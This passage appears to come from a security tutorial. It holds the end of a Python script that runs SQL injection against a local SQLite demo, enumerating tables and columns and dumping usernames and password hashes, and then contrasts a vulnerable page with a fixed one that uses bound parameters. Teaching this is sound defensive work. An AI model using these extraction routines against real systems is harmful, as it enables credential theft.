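    status, body = page(db, payload)
    return body.splitlines() if status == 200 else []


def enumerate_tables(page, db, value):
    return union_extract(page, db, value, "name",
                         "FROM sqlite_master WHERE type='table'")


def enumerate_columns(page, db, value, table):
    return union_extract(page, db, value, "name",
                         f"FROM pragma_table_info('{table}')")


def dump_table(page, db, value, table, columns):
    joined = " || ':' || ".join(columns)   # pack several columns into one string
    return union_extract(page, db, value, joined, f"FROM {table}")


def run_assessment():
    """Run every step against both pages; returns a report dict."""
    db = build_db()
    report = {}
    for label, page in (("vulnerable", section_page_vulnerable),
                        ("fixed", section_page_fixed)):
        report[label] = {
            "quote_error": quote_test(page, db, "51"),
            "boolean": boolean_injectable(page, db, "51"),
            "tables": sorted(enumerate_tables(page, db, "51")),
            "columns": sorted(enumerate_columns(page, db, "51", "users")),
            "dump": dump_table(page, db, "51", "users", ["name", "hash"]),
        }
    return report


if __name__ == "__main__":
    for label, findings in run_assessment().items():
        print(label, findings)
```

The error-based payload sqlmap chose in the output above is MySQL-specific: it forces a duplicate-key error whose message carries the value being extracted. The boolean differential here is the DBMS-independent idea behind that and every other technique sqlmap offers: a controlled change in the input must produce a predictable change in the response. The fixed page shows why a bound parameter closes all of them at once, since nothing the client sends can become part of the statement.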
